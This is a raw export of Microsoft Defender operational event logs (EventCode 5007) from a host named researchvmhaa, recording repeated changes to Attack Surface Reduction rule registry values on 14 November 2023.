LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=500
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0
New value:
11/14/2023 09:44:45 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=499
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 d1e49aac-8f56-4280-b9ba-993a6d77406c e6db77e5-3df2-4cf1-b95a-636979351e5b c1db55ab-c21a-4637-bb3f-a12568109d35 3B576869-A4EC-4529-8536-B80A7769E899 56a863a9-875e-4185-98a7-b882c64b5ce5 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c 26190899-1602-49e8-8b27-eb1d0a1ce869 D4F940AB-401B-4EFC-AADC-AD5F3C50688A 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 D3E037E1-3EB8-44C8-A917-57927947596D 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
11/14/2023 09:44:31 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=498
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0
New value:
11/14/2023 09:44:31 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=497
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0
11/14/2023 09:44:31 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=496
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0
11/14/2023 09:41:42 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=495
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1
11/14/2023 09:38:30 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=494
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1
New value:
11/14/2023 09:38:30 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=493
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
11/14/2023 09:38:29 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=492
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0
New value:
11/14/2023 09:38:29 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=491
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1
11/14/2023 09:36:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=490
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0
New value:
11/14/2023 09:36:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=489
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0
11/14/2023 09:35:59 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=488
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 d1e49aac-8f56-4280-b9ba-993a6d77406c e6db77e5-3df2-4cf1-b95a-636979351e5b c1db55ab-c21a-4637-bb3f-a12568109d35 3B576869-A4EC-4529-8536-B80A7769E899 56a863a9-875e-4185-98a7-b882c64b5ce5 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c 26190899-1602-49e8-8b27-eb1d0a1ce869 D4F940AB-401B-4EFC-AADC-AD5F3C50688A 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 D3E037E1-3EB8-44C8-A917-57927947596D 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
New value:
11/14/2023 09:35:59 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=487
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=486
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=485
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=484
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=483
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=482
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=481
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=480
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=479
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=478
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=477
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=476
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=475
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=474
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=473
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=472
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=471
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=470
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 d1e49aac-8f56-4280-b9ba-993a6d77406c e6db77e5-3df2-4cf1-b95a-636979351e5b c1db55ab-c21a-4637-bb3f-a12568109d35 3B576869-A4EC-4529-8536-B80A7769E899 56a863a9-875e-4185-98a7-b882c64b5ce5 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c 26190899-1602-49e8-8b27-eb1d0a1ce869 D4F940AB-401B-4EFC-AADC-AD5F3C50688A 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 D3E037E1-3EB8-44C8-A917-57927947596D 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=468
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=467
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=466
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=465
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=464
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=463
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=462
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=461
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=460
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=459
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=458
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=457
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=456
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=455
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
